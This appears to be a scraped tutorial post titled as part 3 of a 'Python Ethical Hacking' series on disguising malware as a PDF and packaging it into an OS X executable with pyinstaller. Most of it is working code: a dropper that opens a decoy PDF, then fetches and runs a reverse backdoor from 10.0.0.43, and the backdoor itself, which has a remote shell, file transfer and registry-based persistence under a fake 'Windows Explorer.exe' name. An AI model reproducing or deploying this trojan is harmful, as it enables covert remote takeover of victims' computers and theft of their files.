Convert Python Programs to OS X Executables

https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl

Install the pyinstaller on OS X.

pip3 install pyinstaller

Modify the Python Code - download_and_execute.py

#!/usr/bin/env python

import os

import subprocess

import requests

import tempfile

def download(url):

    get_response = requests.get(url)

    file_name = url.split("/")[-1]

    with open(file_name, "wb") as out_file:

        out_file.write(get_response.content)

temp_directory = tempfile.gettempdir()

os.chdir(temp_directory)

download("http://10.0.0.43/evil-files/sample.pdf")

subprocess.Popen("open sample.pdf", shell=True)

download("http://10.0.0.43/evil-files/reverse_backdoor.py")

subprocess.call("python reverse_backdoor.py", shell=True)

os.remove("sample.pdf")

os.remove("reverse_backdoor.py")

Modify the Python code -  reverse_backdoor.py.

#!/usr/bin/env python

import json

import socket

import subprocess

import os

import base64

import sys

import shutil

import tempfile

def resource_path(relative_path):

    try:

        base_path = sys._MEIPASS

    except Exception:

        base_path = tempfile.gettempdir()

    return os.path.join(base_path, relative_path)

class Backdoor:

    def __init__(self, ip, port):

        self.become_persistent()

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def become_persistent(self):

        evil_file_location = os.environ["appdata"] + "\\Windows Explorer.exe"

        if not os.path.exists(evil_file_location):

            shutil.copyfile(sys.executable, evil_file_location)

            subprocess.call(

                'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d "' + evil_file_location + '"',

                shell=True)

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def change_working_directory_to(self, path):

        os.chdir(path)

        return "[+] Changing working directory to " + path

    def execute_system_command(self, command):

        DEVNULL = open(os.devnull, "wb")

        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def read_file(self, path):

        with open(path, "rb") as file:

            return base64.b64encode(file.read())

    def write_file(self, path, content):

        with open(path, "wb") as file:

            file.write(base64.b64decode(content))

            return "[+] Upload successful."

    def run(self):

        while True:

            command = self.reliable_receive()

            try:

                if command[0] == "exit":

                    self.connection.close()

                    sys.exit()

                elif command[0] == "cd" and len(command) > 1:

                    command_result = self.change_working_directory_to(command[1])

                elif command[0] == "upload":

                    command_result = self.write_file(command[1], command[2])

                elif command[0] == "download":

                    command_result = self.read_file(command[1]).decode()

                else:

                    command_result = self.execute_system_command(command).decode()

            except Exception:

                command_result = "[-] Error during command execution."

            self.reliable_send(command_result)

#file_name = resource_path(os.path.dirname(os.path.abspath(__file__))) + "/sample.pdf"

file_name = tempfile.gettempdir() + "/sample.pdf"

print(file_name)

#subprocess.Popen(file_name, shell=True)

try:

    my_backdoor = Backdoor("10.0.0.43", 4444)

    my_backdoor.run()

except Exception:

    sys.exit()

Prepare an icon file(pdf.icns).

Convert the Python to OS X executable.

pyinstaller --onefile --noconsole --icon pdf.icns download_and_execute.py

Python Ethical Hacking - Malware Packaging(3)的更多相关文章

  1. Python Ethical Hacking - Malware Packaging(2)

    PACKAGING FOR WINDOWS FROM LINUX For best results package the program from the same OS as the target ...

  2. Python Ethical Hacking - Malware Packaging(1)

    PACKAGING Convert python program into an executable that: Packages all program files into a single e ...

  3. Python Ethical Hacking - Malware Packaging(4)

    Converting Python Programs to Linux Executables Note: You can not execute the program on Linux by do ...

  4. Python Ethical Hacking - Malware Analysis(1)

    WRITING MALWARE Download file. Execute Code. Send Report. Download & Execute. Execute & Repo ...

  5. Python Ethical Hacking - Malware Analysis(4)

    DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. ...

  6. Python Ethical Hacking - Malware Analysis(3)

    Stealing WiFi Password Saved on a Computer #!/usr/bin/env python import smtplib import subprocess im ...

  7. Python Ethical Hacking - Malware Analysis(2)

    Filtering Command Output using Regex #!/usr/bin/env python import smtplib import subprocess import r ...

  8. Python Ethical Hacking - TROJANS Analysis(2)

    DOWNLOAD & EXECUTE PAYLOAD A generic executable that downloads & executes files. Disadvantag ...

  9. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

随机推荐

  1. java锁总结

    1.公平锁与非公平锁 公平锁:指多个线程在等待同一个锁时,必须按照申请锁的先后顺序来依次获得锁. 优点:等待锁的线程不会饿死.缺点:整体效率相对较低. 非公平锁:可以抢占,即如果在某个时刻有线程需要获 ...

  2. Vue中hash模式和history模式的区别

    vue-router 中hash模式和history模式. 在vue的路由配置中有mode选项,最直观的区别就是在hash模式下的地址栏里的URL夹杂着‘#’号 ,而history模式下没有.vue默 ...

  3. 关于margin外边距合并的问题

    一 .兄弟元素margin外边距合并演示   当两个垂直方向相邻的兄弟元素都为常规流块盒,他们之间垂直方向的外边距不是两者之和,而是取两者中的最大值.这种现象被称为相邻的兄弟元素垂直方向外边距合并. ...

  4. windows下使用虚拟机安装linux操作系统

    前言:虚拟机是开发者的好帮手,它可以帮助我们在同一台电脑上创建不同的环境,这样你就可以在不影响原有的环境下,使用另外一套新的环境去完成你的开发工作.相信不少在windows下开发的同学对此深有体会,本 ...

  5. Zookeeper面试专题

    Zookeeper面试专题 1. Zookeeper是什么框架 分布式的.开源的分布式应用程序协调服务,原本是Hadoop.HBase的一个重要组件.它为分布式应用提供一致性服务的软件,包括:配置维护 ...

  6. 如何修改git commit的author信息

    本地有多个git账号时,容易发生忘记设置项目默认账号,最后以全局账号提交的情况,其实对代码本身并无影响,只是提交记录里显示的是别的名字稍显别扭. 举个例子:  查看提交日志,假设以a(a@email. ...

  7. vwware虚拟机网卡的三种模式

    这里在虚拟机中必须要保证右上角的两个勾选上 三种模式:简单一个比如宿主机器直接连接路由器上网,那虚拟机和宿主机器是一定的可以上外网,相当于虚拟机直接连接在路由器上面,虚拟机需要配置可以上外网的IP地址 ...

  8. 入门大数据---Spring+Mybatis+Phoenix整合

    一.前言 使用 Spring+Mybatis 操作 Phoenix 和操作其他的关系型数据库(如 Mysql,Oracle)在配置上是基本相同的,下面会分别给出 Spring/Spring Boot ...

  9. openstack Rocky 社区版部署1.2 安装ntp service

    一.controller节点安装ntp 1 安装ntp服务 yum install chrony 2 Edit the chrony.conf file and add, change, or rem ...

  10. MongoDB副本集replica set(三)--添加删除成员

    在上一篇文章中,我们搭建了3个节点的副本集,集群信息如下: rstest:PRIMARY> rs.config() { "_id" : "rstest", ...